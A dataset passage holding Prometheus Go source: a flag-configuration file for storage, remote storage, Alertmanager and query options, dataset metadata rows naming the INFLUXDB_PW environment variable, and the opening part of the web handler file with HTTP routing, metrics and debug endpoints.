// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
package main
import (
"flag"
"fmt"
"net"
"net/url"
"os"
"sort"
"strings"
"text/template"
"time"
"unicode"
"github.com/asaskevich/govalidator"
"github.com/prometheus/common/log"
"github.com/prometheus/prometheus/notifier"
"github.com/prometheus/prometheus/promql"
"github.com/prometheus/prometheus/storage/local"
"github.com/prometheus/prometheus/storage/local/chunk"
"github.com/prometheus/prometheus/storage/local/index"
"github.com/prometheus/prometheus/storage/remote"
"github.com/prometheus/prometheus/web"
)
// cfg contains immutable configuration parameters for a running Prometheus
// server. It is populated by its flag set.
var cfg = struct {
fs *flag.FlagSet
printVersion bool
configFile string
storage local.MemorySeriesStorageOptions
localStorageEngine string
notifier notifier.Options
notifierTimeout time.Duration
queryEngine promql.EngineOptions
web web.Options
remote remote.Options
alertmanagerURLs stringset
prometheusURL string
influxdbURL string
}{
alertmanagerURLs: stringset{},
}
func init() {
cfg.fs = flag.NewFlagSet(os.Args[0], flag.ContinueOnError)
cfg.fs.Usage = usage
// Set additional defaults.
cfg.storage.SyncStrategy = local.Adaptive
cfg.fs.BoolVar(
&cfg.printVersion, "version", false,
"Print version information.",
)
cfg.fs.StringVar(
&cfg.configFile, "config.file", "prometheus.yml",
"Prometheus configuration file name.",
)
// Web.
cfg.fs.StringVar(
&cfg.web.ListenAddress, "web.listen-address", ":9090",
"Address to listen on for the web interface, API, and telemetry.",
)
cfg.fs.StringVar(
&cfg.prometheusURL, "web.external-url", "",
"The URL under which Prometheus is externally reachable (for example, if Prometheus is served via a reverse proxy). Used for generating relative and absolute links back to Prometheus itself. If the URL has a path portion, it will be used to prefix all HTTP endpoints served by Prometheus. If omitted, relevant URL components will be derived automatically.",
)
cfg.fs.StringVar(
&cfg.web.RoutePrefix, "web.route-prefix", "",
"Prefix for the internal routes of web endpoints. Defaults to path of -web.external-url.",
)
cfg.fs.StringVar(
&cfg.web.MetricsPath, "web.telemetry-path", "/metrics",
"Path under which to expose metrics.",
)
cfg.fs.StringVar(
&cfg.web.UserAssetsPath, "web.user-assets", "",
"Path to static asset directory, available at /user.",
)
cfg.fs.BoolVar(
&cfg.web.EnableQuit, "web.enable-remote-shutdown", false,
"Enable remote service shutdown.",
)
cfg.fs.StringVar(
&cfg.web.ConsoleTemplatesPath, "web.console.templates", "consoles",
"Path to the console template directory, available at /consoles.",
)
cfg.fs.StringVar(
&cfg.web.ConsoleLibrariesPath, "web.console.libraries", "console_libraries",
"Path to the console library directory.",
)
// Storage.
cfg.fs.StringVar(
&cfg.storage.PersistenceStoragePath, "storage.local.path", "data",
"Base path for metrics storage.",
)
cfg.fs.IntVar(
&cfg.storage.MemoryChunks, "storage.local.memory-chunks", 1024*1024,
"How many chunks to keep in memory. While the size of a chunk is 1kiB, the total memory usage will be significantly higher than this value * 1kiB. Furthermore, for various reasons, more chunks might have to be kept in memory temporarily. Sample ingestion will be throttled if the configured value is exceeded by more than 10%.",
)
cfg.fs.DurationVar(
&cfg.storage.PersistenceRetentionPeriod, "storage.local.retention", 15*24*time.Hour,
"How long to retain samples in the local storage.",
)
cfg.fs.IntVar(
&cfg.storage.MaxChunksToPersist, "storage.local.max-chunks-to-persist", 512*1024,
"How many chunks can be waiting for persistence before sample ingestion will be throttled. Many chunks waiting to be persisted will increase the checkpoint size.",
)
cfg.fs.DurationVar(
&cfg.storage.CheckpointInterval, "storage.local.checkpoint-interval", 5*time.Minute,
"The period at which the in-memory metrics and the chunks not yet persisted to series files are checkpointed.",
)
cfg.fs.IntVar(
&cfg.storage.CheckpointDirtySeriesLimit, "storage.local.checkpoint-dirty-series-limit", 5000,
"If approx. that many time series are in a state that would require a recovery operation after a crash, a checkpoint is triggered, even if the checkpoint interval hasn't passed yet. A recovery operation requires a disk seek. The default limit intends to keep the recovery time below 1min even on spinning disks. With SSD, recovery is much faster, so you might want to increase this value in that case to avoid overly frequent checkpoints.",
)
cfg.fs.Var(
&cfg.storage.SyncStrategy, "storage.local.series-sync-strategy",
"When to sync series files after modification. Possible values: 'never', 'always', 'adaptive'. Sync'ing slows down storage performance but reduces the risk of data loss in case of an OS crash. With the 'adaptive' strategy, series files are sync'd for as long as the storage is not too much behind on chunk persistence.",
)
cfg.fs.Float64Var(
&cfg.storage.MinShrinkRatio, "storage.local.series-file-shrink-ratio", 0.1,
"A series file is only truncated (to delete samples that have exceeded the retention period) if it shrinks by at least the provided ratio. This saves I/O operations while causing only a limited storage space overhead. If 0 or smaller, truncation will be performed even for a single dropped chunk, while 1 or larger will effectively prevent any truncation.",
)
cfg.fs.BoolVar(
&cfg.storage.Dirty, "storage.local.dirty", false,
"If set, the local storage layer will perform crash recovery even if the last shutdown appears to be clean.",
)
cfg.fs.BoolVar(
&cfg.storage.PedanticChecks, "storage.local.pedantic-checks", false,
"If set, a crash recovery will perform checks on each series file. This might take a very long time.",
)
cfg.fs.Var(
&chunk.DefaultEncoding, "storage.local.chunk-encoding-version",
"Which chunk encoding version to use for newly created chunks. Currently supported is 0 (delta encoding), 1 (double-delta encoding), and 2 (double-delta encoding with variable bit-width).",
)
// Index cache sizes.
cfg.fs.IntVar(
&index.FingerprintMetricCacheSize, "storage.local.index-cache-size.fingerprint-to-metric", index.FingerprintMetricCacheSize,
"The size in bytes for the fingerprint to metric index cache.",
)
cfg.fs.IntVar(
&index.FingerprintTimeRangeCacheSize, "storage.local.index-cache-size.fingerprint-to-timerange", index.FingerprintTimeRangeCacheSize,
"The size in bytes for the metric time range index cache.",
)
cfg.fs.IntVar(
&index.LabelNameLabelValuesCacheSize, "storage.local.index-cache-size.label-name-to-label-values", index.LabelNameLabelValuesCacheSize,
"The size in bytes for the label name to label values index cache.",
)
cfg.fs.IntVar(
&index.LabelPairFingerprintsCacheSize, "storage.local.index-cache-size.label-pair-to-fingerprints", index.LabelPairFingerprintsCacheSize,
"The size in bytes for the label pair to fingerprints index cache.",
)
cfg.fs.IntVar(
&cfg.storage.NumMutexes, "storage.local.num-fingerprint-mutexes", 4096,
"The number of mutexes used for fingerprint locking.",
)
cfg.fs.StringVar(
&cfg.localStorageEngine, "storage.local.engine", "persisted",
"Local storage engine. Supported values are: 'persisted' (full local storage with on-disk persistence) and 'none' (no local storage).",
)
// Remote storage.
cfg.fs.StringVar(
&cfg.remote.GraphiteAddress, "storage.remote.graphite-address", "",
"The host:port of the remote Graphite server to send samples to. None, if empty.",
)
cfg.fs.StringVar(
&cfg.remote.GraphiteTransport, "storage.remote.graphite-transport", "tcp",
"Transport protocol to use to communicate with Graphite. 'tcp', if empty.",
)
cfg.fs.StringVar(
&cfg.remote.GraphitePrefix, "storage.remote.graphite-prefix", "",
"The prefix to prepend to all metrics exported to Graphite. None, if empty.",
)
cfg.fs.StringVar(
&cfg.remote.OpentsdbURL, "storage.remote.opentsdb-url", "",
"The URL of the remote OpenTSDB server to send samples to. None, if empty.",
)
cfg.fs.StringVar(
&cfg.influxdbURL, "storage.remote.influxdb-url", "",
"The URL of the remote InfluxDB server to send samples to. None, if empty.",
)
cfg.fs.StringVar(
&cfg.remote.InfluxdbRetentionPolicy, "storage.remote.influxdb.retention-policy", "default",
"The InfluxDB retention policy to use.",
)
cfg.fs.StringVar(
&cfg.remote.InfluxdbUsername, "storage.remote.influxdb.username", "",
"The username to use when sending samples to InfluxDB. The corresponding password must be provided via the INFLUXDB_PW environment variable.",
)
cfg.fs.StringVar(
&cfg.remote.InfluxdbDatabase, "storage.remote.influxdb.database", "prometheus",
"The name of the database to use for storing samples in InfluxDB.",
)
cfg.fs.DurationVar(
&cfg.remote.StorageTimeout, "storage.remote.timeout", 30*time.Second,
"The timeout to use when sending samples to the remote storage.",
)
// Alertmanager.
cfg.fs.Var(
&cfg.alertmanagerURLs, "alertmanager.url",
"Comma-separated list of Alertmanager URLs to send notifications to.",
)
cfg.fs.IntVar(
&cfg.notifier.QueueCapacity, "alertmanager.notification-queue-capacity", 10000,
"The capacity of the queue for pending alert manager notifications.",
)
cfg.fs.DurationVar(
&cfg.notifierTimeout, "alertmanager.timeout", 10*time.Second,
"Alert manager HTTP API timeout.",
)
// Query engine.
cfg.fs.DurationVar(
&promql.StalenessDelta, "query.staleness-delta", promql.StalenessDelta,
"Staleness delta allowance during expression evaluations.",
)
cfg.fs.DurationVar(
&cfg.queryEngine.Timeout, "query.timeout", 2*time.Minute,
"Maximum time a query may take before being aborted.",
)
cfg.fs.IntVar(
&cfg.queryEngine.MaxConcurrentQueries, "query.max-concurrency", 20,
"Maximum number of queries executed concurrently.",
)
// Flags from the log package have to be added explicitly to our custom flag set.
log.AddFlags(cfg.fs)
}
func parse(args []string) error {
err := cfg.fs.Parse(args)
if err != nil || len(cfg.fs.Args()) != 0 {
if err != flag.ErrHelp {
log.Errorf("Invalid command line arguments. Help: %s -h", os.Args[0])
}
if err == nil {
err = fmt.Errorf("Non-flag argument on command line: %q", cfg.fs.Args()[0])
}
return err
}
if promql.StalenessDelta < 0 {
return fmt.Errorf("negative staleness delta: %s", promql.StalenessDelta)
}
if err := parsePrometheusURL(); err != nil {
return err
}
// Default -web.route-prefix to path of -web.external-url.
if cfg.web.RoutePrefix == "" {
cfg.web.RoutePrefix = cfg.web.ExternalURL.Path
}
// RoutePrefix must always be at least '/'.
cfg.web.RoutePrefix = "/" + strings.Trim(cfg.web.RoutePrefix, "/")
if err := parseInfluxdbURL(); err != nil {
return err
}
for u := range cfg.alertmanagerURLs {
if err := validateAlertmanagerURL(u); err != nil {
return err
}
}
cfg.remote.InfluxdbPassword = os.Getenv("INFLUXDB_PW")
return nil
}
func parsePrometheusURL() error {
if cfg.prometheusURL == "" {
hostname, err := os.Hostname()
if err != nil {
return err
}
_, port, err := net.SplitHostPort(cfg.web.ListenAddress)
if err != nil {
return err
}
cfg.prometheusURL = fmt.Sprintf("http://%s:%s/", hostname, port)
}
if ok := govalidator.IsURL(cfg.prometheusURL); !ok {
return fmt.Errorf("invalid Prometheus URL: %s", cfg.prometheusURL)
}
promURL, err := url.Parse(cfg.prometheusURL)
if err != nil {
return err
}
cfg.web.ExternalURL = promURL
ppref := strings.TrimRight(cfg.web.ExternalURL.Path, "/")
if ppref != "" && !strings.HasPrefix(ppref, "/") {
ppref = "/" + ppref
}
cfg.web.ExternalURL.Path = ppref
return nil
}
func parseInfluxdbURL() error {
if cfg.influxdbURL == "" {
return nil
}
if ok := govalidator.IsURL(cfg.influxdbURL); !ok {
return fmt.Errorf("invalid InfluxDB URL: %s", cfg.influxdbURL)
}
url, err := url.Parse(cfg.influxdbURL)
if err != nil {
return err
}
cfg.remote.InfluxdbURL = url
return nil
}
func validateAlertmanagerURL(u string) error {
if u == "" {
return nil
}
if ok := govalidator.IsURL(u); !ok {
return fmt.Errorf("invalid Alertmanager URL: %s", u)
}
url, err := url.Parse(u)
if err != nil {
return err
}
if url.Scheme == "" {
return fmt.Errorf("missing scheme in Alertmanager URL: %s", u)
}
return nil
}
var helpTmpl = `
usage: prometheus [<args>]
{{ range $cat, $flags := . }}{{ if ne $cat "." }} == {{ $cat | upper }} =={{ end }}
{{ range $flags }}
-{{ .Name }} {{ .DefValue | quote }}
{{ .Usage | wrap 80 6 }}
{{ end }}
{{ end }}
`
func usage() {
helpTmpl = strings.TrimSpace(helpTmpl)
t := template.New("usage")
t = t.Funcs(template.FuncMap{
"wrap": func(width, indent int, s string) (ns string) {
width = width - indent
length := indent
for _, w := range strings.SplitAfter(s, " ") {
if length+len(w) > width {
ns += "\n" + strings.Repeat(" ", indent)
length = 0
}
ns += w
length += len(w)
}
return strings.TrimSpace(ns)
},
"quote": func(s string) string {
if len(s) == 0 || s == "false" || s == "true" || unicode.IsDigit(rune(s[0])) {
return s
}
return fmt.Sprintf("%q", s)
},
"upper": strings.ToUpper,
})
t = template.Must(t.Parse(helpTmpl))
groups := make(map[string][]*flag.Flag)
// Bucket flags into groups based on the first of their dot-separated levels.
cfg.fs.VisitAll(func(fl *flag.Flag) {
parts := strings.SplitN(fl.Name, ".", 2)
if len(parts) == 1 {
groups["."] = append(groups["."], fl)
} else {
name := parts[0]
groups[name] = append(groups[name], fl)
}
})
for cat, fl := range groups {
if len(fl) < 2 && cat != "." {
groups["."] = append(groups["."], fl...)
delete(groups, cat)
}
}
if err := t.Execute(os.Stdout, groups); err != nil {
panic(fmt.Errorf("error executing usage template: %s", err))
}
}
type stringset map[string]struct{}
func (ss stringset) Set(s string) error {
for _, v := range strings.Split(s, ",") {
v = strings.TrimSpace(v)
if v != "" {
ss[v] = struct{}{}
}
}
return nil
}
func (ss stringset) String() string {
return strings.Join(ss.slice(), ",")
}
func (ss stringset) slice() []string {
slice := make([]string, 0, len(ss))
for k := range ss {
slice = append(slice, k)
}
sort.Strings(slice)
return slice
}
|
[
"\"INFLUXDB_PW\""
] |
[] |
[
"INFLUXDB_PW"
] |
[]
|
["INFLUXDB_PW"]
|
go
| 1 | 0 | |
web/web.go
|
// Copyright 2013 The Prometheus Authors
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
package web
import (
"bytes"
"context"
"encoding/json"
"fmt"
"io"
"io/ioutil"
stdlog "log"
"math"
"net"
"net/http"
"net/http/pprof"
"net/url"
"os"
"path"
"path/filepath"
"regexp"
"runtime"
"sort"
"strings"
"sync"
template_text "text/template"
"time"
"github.com/alecthomas/units"
"github.com/go-kit/kit/log"
"github.com/go-kit/kit/log/level"
conntrack "github.com/mwitkow/go-conntrack"
"github.com/opentracing-contrib/go-stdlib/nethttp"
opentracing "github.com/opentracing/opentracing-go"
"github.com/pkg/errors"
"github.com/prometheus/client_golang/prometheus"
"github.com/prometheus/client_golang/prometheus/promhttp"
io_prometheus_client "github.com/prometheus/client_model/go"
"github.com/prometheus/common/model"
"github.com/prometheus/common/route"
"github.com/prometheus/common/server"
"github.com/prometheus/exporter-toolkit/https"
"go.uber.org/atomic"
"golang.org/x/net/netutil"
"github.com/prometheus/prometheus/config"
"github.com/prometheus/prometheus/notifier"
"github.com/prometheus/prometheus/promql"
"github.com/prometheus/prometheus/rules"
"github.com/prometheus/prometheus/scrape"
"github.com/prometheus/prometheus/storage"
"github.com/prometheus/prometheus/template"
"github.com/prometheus/prometheus/tsdb"
"github.com/prometheus/prometheus/tsdb/index"
"github.com/prometheus/prometheus/util/httputil"
api_v1 "github.com/prometheus/prometheus/web/api/v1"
"github.com/prometheus/prometheus/web/ui"
)
// Paths that are handled by the React / Reach router that should all be served the main React app's index.html.
var reactRouterPaths = []string{
"/alerts",
"/config",
"/flags",
"/graph",
"/rules",
"/service-discovery",
"/status",
"/targets",
"/tsdb-status",
}
// withStackTrace logs the stack trace in case the request panics. The function
// will re-raise the error which will then be handled by the net/http package.
// It is needed because the go-kit log package doesn't manage properly the
// panics from net/http (see https://github.com/go-kit/kit/issues/233).
func withStackTracer(h http.Handler, l log.Logger) http.Handler {
return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
defer func() {
if err := recover(); err != nil {
const size = 64 << 10
buf := make([]byte, size)
buf = buf[:runtime.Stack(buf, false)]
level.Error(l).Log("msg", "panic while serving request", "client", r.RemoteAddr, "url", r.URL, "err", err, "stack", buf)
panic(err)
}
}()
h.ServeHTTP(w, r)
})
}
type metrics struct {
requestCounter *prometheus.CounterVec
requestDuration *prometheus.HistogramVec
responseSize *prometheus.HistogramVec
}
func newMetrics(r prometheus.Registerer) *metrics {
m := &metrics{
requestCounter: prometheus.NewCounterVec(
prometheus.CounterOpts{
Name: "prometheus_http_requests_total",
Help: "Counter of HTTP requests.",
},
[]string{"handler", "code"},
),
requestDuration: prometheus.NewHistogramVec(
prometheus.HistogramOpts{
Name: "prometheus_http_request_duration_seconds",
Help: "Histogram of latencies for HTTP requests.",
Buckets: []float64{.1, .2, .4, 1, 3, 8, 20, 60, 120},
},
[]string{"handler"},
),
responseSize: prometheus.NewHistogramVec(
prometheus.HistogramOpts{
Name: "prometheus_http_response_size_bytes",
Help: "Histogram of response size for HTTP requests.",
Buckets: prometheus.ExponentialBuckets(100, 10, 8),
},
[]string{"handler"},
),
}
if r != nil {
r.MustRegister(m.requestCounter, m.requestDuration, m.responseSize)
registerFederationMetrics(r)
}
return m
}
func (m *metrics) instrumentHandlerWithPrefix(prefix string) func(handlerName string, handler http.HandlerFunc) http.HandlerFunc {
return func(handlerName string, handler http.HandlerFunc) http.HandlerFunc {
return m.instrumentHandler(prefix+handlerName, handler)
}
}
func (m *metrics) instrumentHandler(handlerName string, handler http.HandlerFunc) http.HandlerFunc {
return promhttp.InstrumentHandlerCounter(
m.requestCounter.MustCurryWith(prometheus.Labels{"handler": handlerName}),
promhttp.InstrumentHandlerDuration(
m.requestDuration.MustCurryWith(prometheus.Labels{"handler": handlerName}),
promhttp.InstrumentHandlerResponseSize(
m.responseSize.MustCurryWith(prometheus.Labels{"handler": handlerName}),
handler,
),
),
)
}
// PrometheusVersion contains build information about Prometheus.
type PrometheusVersion = api_v1.PrometheusVersion
type LocalStorage interface {
storage.Storage
api_v1.TSDBAdminStats
}
// Handler serves various HTTP endpoints of the Prometheus server
type Handler struct {
logger log.Logger
gatherer prometheus.Gatherer
metrics *metrics
scrapeManager *scrape.Manager
ruleManager *rules.Manager
queryEngine *promql.Engine
lookbackDelta time.Duration
context context.Context
storage storage.Storage
localStorage LocalStorage
notifier *notifier.Manager
apiV1 *api_v1.API
router *route.Router
quitCh chan struct{}
quitOnce sync.Once
reloadCh chan chan error
options *Options
config *config.Config
versionInfo *PrometheusVersion
birth time.Time
cwd string
flagsMap map[string]string
mtx sync.RWMutex
now func() model.Time
ready atomic.Uint32 // ready is uint32 rather than boolean to be able to use atomic functions.
}
// ApplyConfig updates the config field of the Handler struct
func (h *Handler) ApplyConfig(conf *config.Config) error {
h.mtx.Lock()
defer h.mtx.Unlock()
h.config = conf
return nil
}
// Options for the web Handler.
type Options struct {
Context context.Context
TSDBRetentionDuration model.Duration
TSDBDir string
TSDBMaxBytes units.Base2Bytes
LocalStorage LocalStorage
Storage storage.Storage
QueryEngine *promql.Engine
LookbackDelta time.Duration
ScrapeManager *scrape.Manager
RuleManager *rules.Manager
Notifier *notifier.Manager
Version *PrometheusVersion
Flags map[string]string
ListenAddress string
CORSOrigin *regexp.Regexp
ReadTimeout time.Duration
MaxConnections int
ExternalURL *url.URL
RoutePrefix string
UseLocalAssets bool
UserAssetsPath string
ConsoleTemplatesPath string
ConsoleLibrariesPath string
EnableLifecycle bool
EnableAdminAPI bool
PageTitle string
RemoteReadSampleLimit int
RemoteReadConcurrencyLimit int
RemoteReadBytesInFrame int
Gatherer prometheus.Gatherer
Registerer prometheus.Registerer
}
// New initializes a new web Handler.
func New(logger log.Logger, o *Options) *Handler {
if logger == nil {
logger = log.NewNopLogger()
}
m := newMetrics(o.Registerer)
router := route.New().
WithInstrumentation(m.instrumentHandler).
WithInstrumentation(setPathWithPrefix(""))
cwd, err := os.Getwd()
if err != nil {
cwd = "<error retrieving current working directory>"
}
h := &Handler{
logger: logger,
gatherer: o.Gatherer,
metrics: m,
router: router,
quitCh: make(chan struct{}),
reloadCh: make(chan chan error),
options: o,
versionInfo: o.Version,
birth: time.Now().UTC(),
cwd: cwd,
flagsMap: o.Flags,
context: o.Context,
scrapeManager: o.ScrapeManager,
ruleManager: o.RuleManager,
queryEngine: o.QueryEngine,
lookbackDelta: o.LookbackDelta,
storage: o.Storage,
localStorage: o.LocalStorage,
notifier: o.Notifier,
now: model.Now,
}
h.ready.Store(0)
factoryTr := func(_ context.Context) api_v1.TargetRetriever { return h.scrapeManager }
factoryAr := func(_ context.Context) api_v1.AlertmanagerRetriever { return h.notifier }
FactoryRr := func(_ context.Context) api_v1.RulesRetriever { return h.ruleManager }
h.apiV1 = api_v1.NewAPI(h.queryEngine, h.storage, factoryTr, factoryAr,
func() config.Config {
h.mtx.RLock()
defer h.mtx.RUnlock()
return *h.config
},
o.Flags,
api_v1.GlobalURLOptions{
ListenAddress: o.ListenAddress,
Host: o.ExternalURL.Host,
Scheme: o.ExternalURL.Scheme,
},
h.testReady,
h.options.LocalStorage,
h.options.TSDBDir,
h.options.EnableAdminAPI,
logger,
FactoryRr,
h.options.RemoteReadSampleLimit,
h.options.RemoteReadConcurrencyLimit,
h.options.RemoteReadBytesInFrame,
h.options.CORSOrigin,
h.runtimeInfo,
h.versionInfo,
o.Gatherer,
)
if o.RoutePrefix != "/" {
// If the prefix is missing for the root path, prepend it.
router.Get("/", func(w http.ResponseWriter, r *http.Request) {
http.Redirect(w, r, o.RoutePrefix, http.StatusFound)
})
router = router.WithPrefix(o.RoutePrefix)
}
readyf := h.testReady
router.Get("/", func(w http.ResponseWriter, r *http.Request) {
http.Redirect(w, r, path.Join(o.ExternalURL.Path, "/graph"), http.StatusFound)
})
router.Get("/classic/", func(w http.ResponseWriter, r *http.Request) {
http.Redirect(w, r, path.Join(o.ExternalURL.Path, "/classic/graph"), http.StatusFound)
})
// Redirect the original React UI's path (under "/new") to its new path at the root.
router.Get("/new/*path", func(w http.ResponseWriter, r *http.Request) {
p := route.Param(r.Context(), "path")
http.Redirect(w, r, path.Join(o.ExternalURL.Path, strings.TrimPrefix(p, "/new"))+"?"+r.URL.RawQuery, http.StatusFound)
})
router.Get("/classic/alerts", readyf(h.alerts))
router.Get("/classic/graph", readyf(h.graph))
router.Get("/classic/status", readyf(h.status))
router.Get("/classic/flags", readyf(h.flags))
router.Get("/classic/config", readyf(h.serveConfig))
router.Get("/classic/rules", readyf(h.rules))
router.Get("/classic/targets", readyf(h.targets))
router.Get("/classic/service-discovery", readyf(h.serviceDiscovery))
router.Get("/classic/static/*filepath", func(w http.ResponseWriter, r *http.Request) {
r.URL.Path = path.Join("/static", route.Param(r.Context(), "filepath"))
fs := server.StaticFileServer(ui.Assets)
fs.ServeHTTP(w, r)
})
// Make sure that "<path-prefix>/classic" is redirected to "<path-prefix>/classic/" and
// not just the naked "/classic/", which would be the default behavior of the router
// with the "RedirectTrailingSlash" option (https://godoc.org/github.com/julienschmidt/httprouter#Router.RedirectTrailingSlash),
// and which breaks users with a --web.route-prefix that deviates from the path derived
// from the external URL.
// See https://github.com/prometheus/prometheus/issues/6163#issuecomment-553855129.
router.Get("/classic", func(w http.ResponseWriter, r *http.Request) {
http.Redirect(w, r, path.Join(o.ExternalURL.Path, "classic")+"/", http.StatusFound)
})
router.Get("/version", h.version)
router.Get("/metrics", promhttp.Handler().ServeHTTP)
router.Get("/federate", readyf(httputil.CompressionHandler{
Handler: http.HandlerFunc(h.federation),
}.ServeHTTP))
router.Get("/consoles/*filepath", readyf(h.consoles))
serveReactApp := func(w http.ResponseWriter, r *http.Request) {
f, err := ui.Assets.Open("/static/react/index.html")
if err != nil {
w.WriteHeader(http.StatusInternalServerError)
fmt.Fprintf(w, "Error opening React index.html: %v", err)
return
}
idx, err := ioutil.ReadAll(f)
if err != nil {
w.WriteHeader(http.StatusInternalServerError)
fmt.Fprintf(w, "Error reading React index.html: %v", err)
return
}
replacedIdx := bytes.ReplaceAll(idx, []byte("CONSOLES_LINK_PLACEHOLDER"), []byte(h.consolesPath()))
replacedIdx = bytes.ReplaceAll(replacedIdx, []byte("TITLE_PLACEHOLDER"), []byte(h.options.PageTitle))
w.Write(replacedIdx)
}
// Serve the React app.
for _, p := range reactRouterPaths {
router.Get(p, serveReactApp)
}
// The favicon and manifest are bundled as part of the React app, but we want to serve
// them on the root.
for _, p := range []string{"/favicon.ico", "/manifest.json"} {
assetPath := "/static/react" + p
router.Get(p, func(w http.ResponseWriter, r *http.Request) {
r.URL.Path = assetPath
fs := server.StaticFileServer(ui.Assets)
fs.ServeHTTP(w, r)
})
}
// Static files required by the React app.
router.Get("/static/*filepath", func(w http.ResponseWriter, r *http.Request) {
r.URL.Path = path.Join("/static/react/static", route.Param(r.Context(), "filepath"))
fs := server.StaticFileServer(ui.Assets)
fs.ServeHTTP(w, r)
})
if o.UserAssetsPath != "" {
router.Get("/user/*filepath", route.FileServe(o.UserAssetsPath))
}
if o.EnableLifecycle {
router.Post("/-/quit", h.quit)
router.Put("/-/quit", h.quit)
router.Post("/-/reload", h.reload)
router.Put("/-/reload", h.reload)
} else {
forbiddenAPINotEnabled := func(w http.ResponseWriter, _ *http.Request) {
w.WriteHeader(http.StatusForbidden)
w.Write([]byte("Lifecycle API is not enabled."))
}
router.Post("/-/quit", forbiddenAPINotEnabled)
router.Put("/-/quit", forbiddenAPINotEnabled)
router.Post("/-/reload", forbiddenAPINotEnabled)
router.Put("/-/reload", forbiddenAPINotEnabled)
}
router.Get("/-/quit", func(w http.ResponseWriter, _ *http.Request) {
w.WriteHeader(http.StatusMethodNotAllowed)
w.Write([]byte("Only POST or PUT requests allowed"))
})
router.Get("/-/reload", func(w http.ResponseWriter, _ *http.Request) {
w.WriteHeader(http.StatusMethodNotAllowed)
w.Write([]byte("Only POST or PUT requests allowed"))
})
router.Get("/debug/*subpath", serveDebug)
router.Post("/debug/*subpath", serveDebug)
router.Get("/-/healthy", func(w http.ResponseWriter, r *http.Request) {
w.WriteHeader(http.StatusOK)
fmt.Fprintf(w, "Prometheus is Healthy.\n")
})
router.Get("/-/ready", readyf(func(w http.ResponseWriter, r *http.Request) {
w.WriteHeader(http.StatusOK)
fmt.Fprintf(w, "Prometheus is Ready.\n")
}))
return h
}
func serveDebug(w http.ResponseWriter, req *http.Request) {
ctx := req.Context()
subpath := route.Param(ctx, "subpath")
if subpath == "/pprof" {
http.Redirect(w, req, req.URL.Path+"/", http.StatusMovedPermanently)
return
}
if !strings.HasPrefix(subpath, "/pprof/") {
http.NotFound(w, req)
return
}
subpath = strings.TrimPrefix(subpath, "/pprof/")
switch subpath {
case "cmdline":
pprof.Cmdline(w, req)
case "profile":
pprof.Profile(w, req)
case "symbol":
pprof.Symbol(w, req)
case "trace":
pprof.Trace(w, req)
default:
req.URL.Path = "/debug/pprof/" + subpath
pprof.Index(w, req)
}
}
// Ready sets Handler to be ready.
func (h *Handler) Ready() {
h.ready.Store(1)
}
// Verifies whether the server is ready or not.
func (h *Handler) isReady() bool {
return h.ready.Load() > 0
}
// Checks if server is ready, calls f if it is, returns 503 if it is not.
func (h *Handler) testReady(f http.HandlerFunc) http.HandlerFunc {
return func(w http.ResponseWriter, r *http.Request) {
if h.isReady() {
f(w, r)
} else {
w.WriteHeader(http.StatusServiceUnavailable)
fmt.Fprintf(w, "Service Unavailable")
}
}
}
// Quit returns the receive-only quit channel.
func (h *Handler) Quit() <-chan struct{} {
return h.quitCh
}
// Reload returns the receive-only channel that signals configuration reload requests.
func (h *Handler) Reload() <-chan chan error {
return h.reloadCh
}
// Listener creates the TCP listener for web requests.
func (h *Handler) Listener() (net.Listener, error) {
level.Info(h.logger).Log("msg", "Start listening for connections", "address", h.options.ListenAddress)
listener, err := net.Listen("tcp", h.options.ListenAddress)
if err != nil {
return listener, err
}
listener = netutil.LimitListener(listener, h.options.MaxConnections)
// Monitor incoming connections with conntrack.
listener = conntrack.NewListener(listener,
conntrack.TrackWithName("http"),
conntrack.TrackWithTracing())
return listener, nil
}
// Run serves the HTTP endpoints.
func (h *Handler) Run(ctx context.Context, listener net.Listener, httpsConfig string) error {
if listener == nil {
var err error
listener, err = h.Listener()
if err != nil {
return err
}
}
operationName := nethttp.OperationNameFunc(func(r *http.Request) string {
return fmt.Sprintf("%s %s", r.Method, r.URL.Path)
})
mux := http.NewServeMux()
mux.Handle("/", h.router)
apiPath := "/api"
if h.options.RoutePrefix != "/" {
apiPath = h.options.RoutePrefix + apiPath
level.Info(h.logger).Log("msg", "Router prefix", "prefix", h.options.RoutePrefix)
}
av1 := route.New().
WithInstrumentation(h.metrics.instrumentHandlerWithPrefix("/api/v1")).
WithInstrumentation(setPathWithPrefix(apiPath + "/v1"))
h.apiV1.Register(av1)
mux.Handle(apiPath+"/v1/", http.StripPrefix(apiPath+"/v1", av1))
errlog := stdlog.New(log.NewStdlibAdapter(level.Error(h.logger)), "", 0)
httpSrv := &http.Server{
Handler: withStackTracer(nethttp.Middleware(opentracing.GlobalTracer(), mux, operationName), h.logger),
ErrorLog: errlog,
ReadTimeout: h.options.ReadTimeout,
}
errCh := make(chan error)
go func() {
errCh <- https.Serve(listener, httpSrv, httpsConfig, h.logger)
}()
select {
case e := <-errCh:
return e
case <-ctx.Done():
httpSrv.Shutdown(ctx)
return nil
}
}
func (h *Handler) alerts(w http.ResponseWriter, r *http.Request) {
var groups []*rules.Group
for _, group := range h.ruleManager.RuleGroups() {
if group.HasAlertingRules() {
groups = append(groups, group)
}
}
alertStatus := AlertStatus{
Groups: groups,
AlertStateToRowClass: map[rules.AlertState]string{
rules.StateInactive: "success",
rules.StatePending: "warning",
rules.StateFiring: "danger",
},
Counts: alertCounts(groups),
}
h.executeTemplate(w, "alerts.html", alertStatus)
}
func alertCounts(groups []*rules.Group) AlertByStateCount {
result := AlertByStateCount{}
for _, group := range groups {
for _, alert := range group.AlertingRules() {
switch alert.State() {
case rules.StateInactive:
result.Inactive++
case rules.StatePending:
result.Pending++
case rules.StateFiring:
result.Firing++
}
}
}
return result
}
func (h *Handler) consoles(w http.ResponseWriter, r *http.Request) {
ctx := r.Context()
name := route.Param(ctx, "filepath")
file, err := http.Dir(h.options.ConsoleTemplatesPath).Open(name)
if err != nil {
http.Error(w, err.Error(), http.StatusNotFound)
return
}
defer file.Close()
text, err := ioutil.ReadAll(file)
if err != nil {
